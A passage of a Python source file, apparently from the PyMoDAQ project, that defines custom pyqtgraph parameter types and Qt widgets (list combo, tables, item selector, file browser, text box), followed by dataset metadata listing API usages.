SimpleParameterCustom, override=True)\nregisterParameterType('float', 
SimpleParameterCustom, override=True)\nregisterParameterType('bool', SimpleParameterCustom, override=True)\nregisterParameterType('bool_push', SimpleParameterCustom, override=True)\nregisterParameterType('led_push', SimpleParameterCustom, override=True)\nregisterParameterType('date_time', SimpleParameterCustom, override=True)\nregisterParameterType('date', SimpleParameterCustom, override=True)\nregisterParameterType('time', SimpleParameterCustom, override=True)\nregisterParameterType('led', SimpleParameterCustom, override=True)\nregisterParameterType('pixmap', SimpleParameterCustom, override=True)\nregisterParameterType('pixmap_check', SimpleParameterCustom, override=True)\nregisterParameterType('slide', SimpleParameterCustom, override=True)\n\n\nclass ListParameterItem_custom(pTypes.ListParameterItem):\n \"\"\"\n WidgetParameterItem subclass providing comboBox that lets the user select from a list of options.\n\n \"\"\"\n\n def __init__(self, param, depth):\n super().__init__(param, depth)\n if 'tip' in param.opts:\n self.displayLabel.setToolTip(param.opts['tip'])\n\n def makeWidget(self):\n \"\"\"\n Make a widget from self parameter options, connected to the buttonClicked function.\n\n Returns\n -------\n w: widget\n the initialized widget\n\n See Also\n --------\n buttonClicked, limitsChanged,\n \"\"\"\n opts = self.param.opts\n t = opts['type']\n w = Combo_pb()\n w.add_pb.clicked.connect(self.buttonClicked)\n w.setMaximumHeight(20) # # set to match height of spin box and line edit\n if 'show_pb' in opts:\n w.add_pb.setVisible(opts['show_pb'])\n else:\n w.add_pb.setVisible(False)\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.sigChanged = w.combo.currentIndexChanged\n w.value = self.value\n w.setValue = self.setValue\n self.widget = w # # needs to be set before limits are changed\n self.limitsChanged(self.param, self.param.opts['limits'])\n if len(self.forward) > 0:\n self.setValue(self.param.value())\n return w\n\n def value(self):\n key = str(self.widget.combo.currentText())\n return self.forward.get(key, None)\n\n def setValue(self, val):\n self.targetValue = val\n if val not in self.reverse[0]:\n self.widget.combo.setCurrentIndex(0)\n else:\n key = self.reverse[1][self.reverse[0].index(val)]\n ind = self.widget.combo.findText(key)\n self.widget.combo.setCurrentIndex(ind)\n\n def limitsChanged(self, param, limits):\n \"\"\"\n Set up forward / reverse mappings for the {name:value} limits dictionary.\n\n =============== ================================== ========================================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter Not used\n *limits* dictionary the limits dictionary to be mapped\n =============== ================================== ========================================\n\n \"\"\"\n\n if len(limits) == 0:\n limits = [''] # # Can never have an empty list--there is always at least a single blank item.\n\n self.forward, self.reverse = ListParameter_custom.mapping(limits)\n try:\n self.widget.blockSignals(True)\n val = self.targetValue # asUnicode(self.widget.currentText())\n\n self.widget.combo.clear()\n for k in self.forward:\n self.widget.combo.addItem(k)\n if k == val:\n self.widget.combo.setCurrentIndex(self.widget.count() - 1)\n self.updateDisplayLabel()\n finally:\n self.widget.blockSignals(False)\n\n def buttonClicked(self):\n \"\"\"\n |\n | Append a user-entered string value to the parameter limits.\n | Update the parameter and call 
the limitsChanged method to map the added parameter.\n\n See Also\n --------\n limitsChanged,\n \"\"\"\n if isinstance(self.param.opts['limits'], list):\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n self.param.opts['limits'].append(text)\n self.limitsChanged(self.param, self.param.opts['limits'])\n self.param.setValue(text)\n\n def optsChanged(self, param, opts):\n \"\"\"\n Called when any options are changed that are not name, value, default, or limits.\n\n =============== ================================== =======================================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter The parameter to be checked\n *opts* string list The option dictionary to be checked\n =============== ================================== =======================================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'show_pb' in opts:\n self.widget.add_pb.setVisible(opts['show_pb'])\n if 'enabled' in opts:\n self.widget.setEnabled(opts['enabled'])\n\n\nclass ListParameter_custom(pTypes.ListParameter):\n \"\"\"\n =============== =======================================\n **Attributes** **Type**\n *itemClass* instance of ListParameterItem_custom\n *sigActivated* instance of pyqt Signal\n =============== =======================================\n \"\"\"\n itemClass = ListParameterItem_custom\n sigActivated = Signal(object)\n\n def __init__(self, **opts):\n super(ListParameter_custom, self).__init__(**opts)\n\n def activate(self):\n \"\"\"\n Emit the Activated signal.\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('list', ListParameter_custom, override=True)\n\n\nclass Combo_pb(QtWidgets.QWidget):\n\n def __init__(self, items=None):\n\n super(Combo_pb, self).__init__()\n self.items = items if items is not None else [] # avoid sharing a mutable default argument\n self.initUI()\n self.count = self.combo.count\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.combo = QtWidgets.QComboBox()\n self.combo.addItems(self.items)\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.combo)\n self.hor_layout.addWidget(self.add_pb)\n self.hor_layout.setSpacing(0)\n self.hor_layout.setContentsMargins(0, 0, 0, 0)\n self.add_pb.setMaximumWidth(25)\n self.setLayout(self.hor_layout)\n self.currentText = self.combo.currentText\n\n\nclass TableParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n React to changes in the widget tree.\n \"\"\"\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n 
self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Table_custom.\n\n Returns\n -------\n table : instance of Table_custom.\n The initialized table.\n\n See Also\n --------\n Table_custom\n \"\"\"\n opts = self.param.opts\n w = Table_custom()\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.setColumnCount(2)\n if 'header' in opts:\n w.setHorizontalHeaderLabels(self.param.opts['header'])\n if 'height' not in opts:\n opts['height'] = 200\n w.setMaximumHeight(opts['height'])\n # self.table.setReadOnly(self.param.opts.get('readonly', False))\n w.value = w.get_table_value\n w.setValue = w.set_table_value\n w.sigChanged = w.itemChanged\n return w\n\n\nclass Table_custom(QtWidgets.QTableWidget):\n \"\"\"\n ============== ===========================\n **Attributes** **Type**\n *valuechanged* instance of pyqt Signal\n *QtWidgets* instance of QTableWidget\n ============== ===========================\n \"\"\"\n\n valuechanged = Signal(OrderedDict)\n\n def __init__(self):\n QtWidgets.QTableWidget.__init__(self)\n\n def get_table_value(self):\n \"\"\"\n Get the current contents of the table.\n\n Returns\n -------\n data : OrderedDict\n The retrieved values dictionary.\n \"\"\"\n data = OrderedDict([])\n for ind in range(self.rowCount()):\n item0 = self.item(ind, 0)\n item1 = self.item(ind, 1)\n if item0 is not None and item1 is not None:\n try:\n data[item0.text()] = float(item1.text())\n except Exception:\n data[item0.text()] = item1.text()\n return data\n\n def set_table_value(self, data_dict):\n \"\"\"\n Set the data values dictionary into the custom table.\n\n =============== ====================== ================================================\n **Parameters** **Type** **Description**\n *data_dict* ordered dictionary the contents to be stored in the custom table\n =============== ====================== ================================================\n \"\"\"\n try:\n self.setRowCount(len(data_dict))\n self.setColumnCount(2)\n for ind, (key, value) in enumerate(data_dict.items()):\n item0 = QtWidgets.QTableWidgetItem(key)\n item0.setFlags(item0.flags() ^ Qt.ItemIsEditable)\n if isinstance(value, float):\n item1 = QtWidgets.QTableWidgetItem('{:.6e}'.format(value))\n else:\n item1 = QtWidgets.QTableWidgetItem(str(value))\n item1.setFlags(item1.flags() ^ Qt.ItemIsEditable)\n self.setItem(ind, 0, item0)\n self.setItem(ind, 1, item1)\n # self.valuechanged.emit(data_dict)\n\n except Exception:\n pass # ignore content that cannot be laid out in the table\n\n\nclass TableParameter(Parameter):\n \"\"\"\n =============== =================================\n **Attributes** **Type**\n *itemClass* instance of TableParameterItem\n *Parameter* instance of pyqtgraph parameter\n =============== =================================\n \"\"\"\n itemClass = TableParameterItem\n \"\"\"Editable table; displayed as a two-column key/value table in the tree.\"\"\"\n\n # def __init(self):\n # super(TableParameter,self).__init__()\n\n def setValue(self, value):\n self.opts['value'] = value\n self.sigValueChanged.emit(self, value)\n\n\nregisterParameterType('table', TableParameter, override=True)\n\n\nclass TableViewParameterItem(WidgetParameterItem):\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n React to changes in the widget tree.\n \"\"\"\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n 
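# host the table view widget inside the spanned sub-item row\n 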
self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Table_custom.\n\n Returns\n -------\n table : instance of Table_custom.\n The initialized table.\n\n See Also\n --------\n Table_custom\n \"\"\"\n menu = False\n opts = self.param.opts\n if 'menu' in opts:\n menu = opts['menu']\n w = TableViewCustom(menu=menu)\n\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n\n w.setMaximumHeight(200)\n # self.table.setReadOnly(self.param.opts.get('readonly', False))\n w.value = w.get_table_value\n w.setValue = w.set_table_value\n w.sigChanged = w.valueChanged\n return w\n\n def optsChanged(self, param, opts):\n \"\"\"\n | Called when any options are changed that are not name, value, default, or limits.\n |\n | If widget is a SpinBox, pass options straight through.\n | So that only the display label is shown when visible option is toggled.\n\n =============== ================================== ==============================\n **Parameters** **Type** **Description**\n *param* instance of pyqtgraph parameter the parameter to check\n *opts* string list the associated options list\n =============== ================================== ==============================\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'readonly' in opts:\n self.updateDefaultBtn()\n if isinstance(self.widget, (QtWidgets.QCheckBox, ColorButton.ColorButton)):\n self.widget.setEnabled(not opts['readonly'])\n\n if 'delegate' in opts:\n styledItemDelegate = QtWidgets.QStyledItemDelegate()\n styledItemDelegate.setItemEditorFactory(opts['delegate']())\n self.widget.setItemDelegate(styledItemDelegate)\n\n if 'menu' in opts:\n self.widget.setmenu(opts['menu'])\n\n\nclass TableViewCustom(QtWidgets.QTableView):\n \"\"\"\n ============== ===========================\n *Attributes** **Type**\n *valuechanged* instance of pyqt Signal\n *QtWidgets* instance of QTableWidget\n ============== ===========================\n \"\"\"\n\n valueChanged = Signal(list)\n add_data_signal = Signal(int)\n remove_row_signal = Signal(int)\n load_data_signal = Signal()\n save_data_signal = Signal()\n\n def __init__(self, menu=False):\n super().__init__()\n self.setmenu(menu)\n\n def setmenu(self, status):\n if status:\n self.menu = QtWidgets.QMenu()\n self.menu.addAction('Add new', self.add)\n self.menu.addAction('Remove selected row', self.remove)\n self.menu.addAction('Clear all', self.clear)\n self.menu.addSeparator()\n self.menu.addAction('Load as txt', lambda: self.load_data_signal.emit())\n self.menu.addAction('Save as txt', lambda: self.save_data_signal.emit())\n else:\n self.menu = None\n\n def clear(self):\n self.model().clear()\n\n def add(self):\n self.add_data_signal.emit(self.currentIndex().row())\n\n def remove(self):\n self.remove_row_signal.emit(self.currentIndex().row())\n\n def data_has_changed(self, topleft, bottomright, roles):\n self.valueChanged.emit([topleft, bottomright, roles])\n\n def get_table_value(self):\n \"\"\"\n\n \"\"\"\n return self.model()\n\n def set_table_value(self, data_model):\n \"\"\"\n\n \"\"\"\n try:\n self.setModel(data_model)\n self.model().dataChanged.connect(self.data_has_changed)\n except Exception as e:\n pass\n\n def contextMenuEvent(self, event):\n if self.menu is not 
None:\n self.menu.exec(event.globalPos())\n\n\nclass TableViewParameter(Parameter):\n \"\"\"\n =============== =================================\n **Attributes** **Type**\n *itemClass* instance of TableParameterItem\n *Parameter* instance of pyqtgraph parameter\n =============== =================================\n \"\"\"\n itemClass = TableViewParameterItem\n\n def setValue(self, value):\n self.opts['value'] = value\n self.sigValueChanged.emit(self, value)\n\n\nregisterParameterType('table_view', TableViewParameter, override=True)\n\n\nclass ItemSelectParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n \"\"\"\n\n \"\"\"\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.widget)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n | Make and initialize an instance of ItemSelect_pb with itemselect value.\n | Connect the created object with the buttonClicked function.\n\n \"\"\"\n opts = self.param.opts\n w = ItemSelect_pb()\n w.itemselect.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n if 'height' in opts:\n w.itemselect.setMaximumHeight(opts['height'])\n else:\n w.itemselect.setMaximumHeight(70)\n # w.setReadOnly(self.param.opts.get('readonly', False))\n if 'show_pb' in opts:\n w.add_pb.setVisible(opts['show_pb'])\n else:\n w.add_pb.setVisible(False)\n if 'tip' in opts:\n w.setToolTip(opts['tip'])\n w.value = w.itemselect.get_value\n w.setValue = w.itemselect.set_value\n w.sigChanged = w.itemselect.itemSelectionChanged\n w.add_pb.clicked.connect(self.buttonClicked)\n return w\n\n def buttonClicked(self):\n \"\"\"\n Append to the param attribute the dictionnary obtained from the QtWidget add parameter procedure.\n \"\"\"\n\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n all = self.param.value()['all_items']\n all.append(text)\n sel = self.param.value()['selected']\n sel.append(text)\n val = dict(all_items=all, selected=sel)\n self.param.setValue(val)\n self.param.sigValueChanged.emit(self.param, val)\n\n def optsChanged(self, param, opts):\n \"\"\"\n Called when any options are changed that are not name, value, default, or limits.\n\n See Also\n --------\n optsChanged\n \"\"\"\n # print \"opts changed:\", opts\n ParameterItem.optsChanged(self, param, opts)\n\n if 'show_pb' in opts:\n self.widget.add_pb.setVisible(opts['show_pb'])\n\n\nclass ItemSelect_pb(QtWidgets.QWidget):\n def __init__(self):\n\n super(ItemSelect_pb, self).__init__()\n self.initUI()\n\n def initUI(self):\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.itemselect = ItemSelect()\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.itemselect)\n 
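# the selectable item list sits to the left of the 'add' push-button\n 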
self.hor_layout.addWidget(self.add_pb)\n self.hor_layout.setSpacing(0)\n\n self.setLayout(self.hor_layout)\n\n\nclass ItemSelect(QtWidgets.QListWidget):\n def __init__(self):\n QtWidgets.QListWidget.__init__(self)\n\n def get_value(self):\n \"\"\"\n Get the dictionary of values contained in the QtWidget attribute.\n\n Returns\n -------\n dictionary\n The dictionary of all_items compared to the selected items.\n \"\"\"\n selitems = [item.text() for item in self.selectedItems()]\n allitems = [item.text() for item in self.all_items()]\n return dict(all_items=allitems, selected=selitems)\n\n def all_items(self):\n \"\"\"\n Get the all_items list from the self QtWidget attribute.\n\n Returns\n -------\n list\n The item list.\n \"\"\"\n return [self.item(ind) for ind in range(self.count())]\n\n def set_value(self, values):\n \"\"\"\n Set values to the all_items attributes filtering values by the 'selected' key.\n\n =============== ============== =======================================\n **Parameters** **Type** **Description**\n *values* dictionary the values dictionary to be set.\n =============== ============== =======================================\n \"\"\"\n allitems = [item.text() for item in self.all_items()]\n if allitems != values['all_items']:\n self.clear()\n self.addItems(values['all_items'])\n QtWidgets.QApplication.processEvents()\n for item in self.all_items():\n if item.text() in values['selected']:\n item.setSelected(True)\n\n\nclass ItemSelectParameter(Parameter):\n \"\"\"\n List of items from which one or several can be selected.\n\n =============== ======================================\n **Attributes** **Type**\n *itemClass* instance of ItemSelectParameterItem\n *sigActivated* instance of pyqt Signal\n =============== ======================================\n \"\"\"\n itemClass = ItemSelectParameterItem\n sigActivated = Signal(object)\n\n def activate(self):\n \"\"\"\n Emit the Activated signal.\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('itemselect', ItemSelectParameter, override=True)\n\n\nclass ActionParameterItem(pTypes.ActionParameterItem):\n def __init__(self, param, depth):\n super().__init__(param, depth)\n\n if 'title' in param.opts:\n name = param.opts['title']\n else:\n name = param.name()\n self.button.setText(name)\n\n\nclass ActionParameter(pTypes.ActionParameter):\n \"\"\"Used for displaying a button within the tree.\"\"\"\n itemClass = ActionParameterItem\n\n\nregisterParameterType('action', ActionParameter, override=True)\n\n\nclass file_browserParameterItem(WidgetParameterItem):\n\n def __init__(self, param, depth):\n self.filetype = False\n super().__init__(param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.w)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make an initialized file_browser object using the parameter options dictionary ('readonly' key).\n\n Returns\n -------\n w : file_browser\n The initialized file 
browser.\n\n See Also\n --------\n file_browser\n \"\"\"\n if 'filetype' in self.param.opts:\n self.filetype = self.param.opts['filetype']\n else:\n self.filetype = True\n\n self.w = file_browser(self.param.value(), file_type=self.filetype)\n if 'tip' in self.param.opts:\n self.w.setToolTip(self.param.opts['tip'])\n # self.file_browser.setMaximumHeight(100)\n self.w.base_path_edit.setReadOnly(self.param.opts['readonly'])\n self.w.value = self.w.get_value\n self.w.setValue = self.w.set_path\n self.w.sigChanged = self.w.value_changed\n return self.w\n\n\nclass file_browser(QtWidgets.QWidget):\n \"\"\"\n ================ =========================\n **Attributes** **Type**\n *value_changed* instance of pyqt Signal\n *path* string\n ================ =========================\n\n See Also\n --------\n browse_path\n \"\"\"\n value_changed = Signal(str)\n\n def __init__(self, init_path='D:/Data', file_type=False):\n\n super(file_browser, self).__init__()\n self.filetype = file_type\n self.path = init_path\n self.initUI()\n\n self.base_path_browse_pb.clicked.connect(self.browse_path)\n\n def browse_path(self):\n \"\"\"\n Open a dialog to browse for a new file or folder path, starting from the current path attribute.\n\n See Also\n --------\n set_path\n \"\"\"\n if self.filetype is True:\n folder_name = QtWidgets.QFileDialog.getOpenFileName(None, 'Choose File', os.path.split(self.path)[0])[0]\n elif self.filetype is False:\n folder_name = QtWidgets.QFileDialog.getExistingDirectory(None, 'Choose Folder', self.path)\n\n elif self.filetype == \"save\":\n folder_name = QtWidgets.QFileDialog.getSaveFileName(None, 'Enter a Filename', os.path.split(self.path)[0])[0]\n\n if folder_name: # execute only if the user didn't cancel the file selection\n self.set_path(folder_name)\n self.value_changed.emit(folder_name)\n\n def set_path(self, path_file):\n \"\"\"\n Set the base path attribute with the given path_file.\n\n =============== =========== ===========================\n **Parameters** **Type** **Description**\n *path_file* string the pathname of the file\n =============== =========== ===========================\n \"\"\"\n if isinstance(path_file, Path):\n path_file = str(path_file)\n self.base_path_edit.setPlainText(path_file)\n self.path = path_file\n\n def get_value(self):\n \"\"\"\n Get the value of the base_path_edit attribute.\n\n Returns\n -------\n string\n the path name\n \"\"\"\n return self.base_path_edit.toPlainText()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.base_path_edit = QtWidgets.QPlainTextEdit(self.path)\n self.base_path_edit.setMaximumHeight(50)\n self.base_path_browse_pb = QtWidgets.QPushButton()\n self.base_path_browse_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Browse_Dir_Path.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.base_path_browse_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.base_path_edit)\n\n verlayout = QtWidgets.QVBoxLayout()\n verlayout.addWidget(self.base_path_browse_pb)\n verlayout.addStretch()\n self.hor_layout.addLayout(verlayout)\n self.hor_layout.setSpacing(0)\n self.setLayout(self.hor_layout)\n\n\nclass file_browserParameter(Parameter):\n \"\"\"\n Editable path; displayed as a text box with a browse button in the tree.\n See Also\n --------\n file_browserParameterItem\n \"\"\"\n itemClass = file_browserParameterItem\n\n\nregisterParameterType('browsepath', file_browserParameter, override=True)\n\n\nclass Plain_text_pbParameterItem(pTypes.WidgetParameterItem):\n\n def __init__(self, param, 
depth):\n pTypes.WidgetParameterItem.__init__(self, param, depth)\n self.hideWidget = False\n self.subItem = QtWidgets.QTreeWidgetItem()\n self.addChild(self.subItem)\n\n def treeWidgetChanged(self):\n # # TODO: fix so that superclass method can be called\n # # (WidgetParameter should just natively support this style)\n # WidgetParameterItem.treeWidgetChanged(self)\n self.treeWidget().setFirstItemColumnSpanned(self.subItem, True)\n self.treeWidget().setItemWidget(self.subItem, 0, self.w)\n\n # for now, these are copied from ParameterItem.treeWidgetChanged\n self.setHidden(not self.param.opts.get('visible', True))\n self.setExpanded(self.param.opts.get('expanded', True))\n\n def makeWidget(self):\n \"\"\"\n Make and initialize an instance of Plain_text_pb object from parameter options dictionnary (using 'readonly' key).\n\n Returns\n -------\n Plain_text_pb object\n The initialized object.\n\n See Also\n --------\n Plain_text_pb, buttonClicked\n \"\"\"\n self.w = Plain_text_pb()\n self.w.text_edit.setReadOnly(self.param.opts.get('readonly', False))\n self.w.value = self.w.get_value\n self.w.setValue = self.w.set_value\n self.w.sigChanged = self.w.value_changed\n self.w.add_pb.clicked.connect(self.buttonClicked)\n return self.w\n\n def buttonClicked(self):\n text, ok = QtWidgets.QInputDialog.getText(None, \"Enter a value to add to the parameter\",\n \"String value:\", QtWidgets.QLineEdit.Normal)\n if ok and not (text == \"\"):\n self.param.setValue(self.param.value() + '\\n' + text)\n\n\nclass Plain_text_pb(QtWidgets.QWidget):\n \"\"\"\n ================ ========================\n **Attributes** **Type**\n *value_changed* instance of pyqt Signal\n ================ ========================\n\n See Also\n --------\n initUI, emitsignal\n \"\"\"\n value_changed = Signal(str)\n\n def __init__(self):\n\n super(Plain_text_pb, self).__init__()\n\n self.initUI()\n self.text_edit.textChanged.connect(self.emitsignal)\n\n def emitsignal(self):\n \"\"\"\n Emit the value changed signal from the text_edit attribute.\n \"\"\"\n text = self.text_edit.toPlainText()\n self.value_changed.emit(text)\n\n def set_value(self, txt):\n \"\"\"\n Set the value of the text_edit attribute.\n\n =============== =========== ================================\n **Parameters** **Type** **Description**\n *txt* string the string value to be setted\n =============== =========== ================================\n \"\"\"\n self.text_edit.setPlainText(txt)\n\n def get_value(self):\n \"\"\"\n Get the value of the text_edit attribute.\n\n Returns\n -------\n string\n The string value of text_edit.\n \"\"\"\n return self.text_edit.toPlainText()\n\n def initUI(self):\n \"\"\"\n Init the User Interface.\n \"\"\"\n\n self.hor_layout = QtWidgets.QHBoxLayout()\n self.text_edit = QtWidgets.QPlainTextEdit()\n self.text_edit.setReadOnly(True)\n self.text_edit.setMaximumHeight(50)\n\n self.add_pb = QtWidgets.QPushButton()\n self.add_pb.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/Icon_Library/Add2.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.add_pb.setIcon(icon3)\n self.hor_layout.addWidget(self.text_edit)\n\n verlayout = QtWidgets.QVBoxLayout()\n verlayout.addWidget(self.add_pb)\n verlayout.addStretch()\n self.hor_layout.addLayout(verlayout)\n self.hor_layout.setSpacing(0)\n self.setLayout(self.hor_layout)\n\n\nclass Plain_text_pbParameter(Parameter):\n \"\"\"Editable string; displayed as large text box in the tree.\"\"\"\n itemClass = Plain_text_pbParameterItem\n sigActivated = Signal(object)\n\n def 
activate(self):\n \"\"\"\n Send the Activated signal.\n \"\"\"\n self.sigActivated.emit(self)\n self.emitStateChanged('activated', None)\n\n\nregisterParameterType('text_pb', Plain_text_pbParameter, override=True)\n\n\nclass TextParameterItemCustom(pTypes.TextParameterItem):\n def __init__(self, param, depth):\n super(TextParameterItemCustom, self).__init__(param, depth)\n\n self.textBox.setMaximumHeight(50)\n\n\nclass TextParameter(Parameter):\n \"\"\"Editable string; displayed as large text box in the tree.\"\"\"\n itemClass = TextParameterItemCustom\n\n\nregisterParameterType('text', TextParameter, override=True)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = QTimeCustom()\n ex.setMinuteIncrement(30)\n ex.show()\n sys.exit(app.exec_())\n", "sub_path": "src/pymodaq/daq_utils/parameter/oldpymodaq_ptypes.py", "file_name": "oldpymodaq_ptypes.py", "file_ext": "py", "file_size_in_byte": 57090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 28, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameterItem", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 38, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.GroupParameter", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 47, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 67, "usage_type": "call"}, {"api_name": "pyqtgraph.widgets.SpinBox.SpinBox", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.SpinBox", "line_number": 70, "usage_type": "name"}, {"api_name": "decimal.Decimal", "line_number": 93, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 142, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 142, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 160, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 160, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 161, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 161, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 162, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 162, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 163, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 163, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 175, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 175, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QByteArray", "line_number": 176, "usage_type": "call"}, {"api_name": "qtpy.QtGui.QImage.fromData", "line_number": 177, "usage_type": "call"}, {"api_name": "qtpy.QtGui.QImage", "line_number": 177, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 177, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap.fromImage", "line_number": 178, "usage_type": "call"}, {"api_name": 
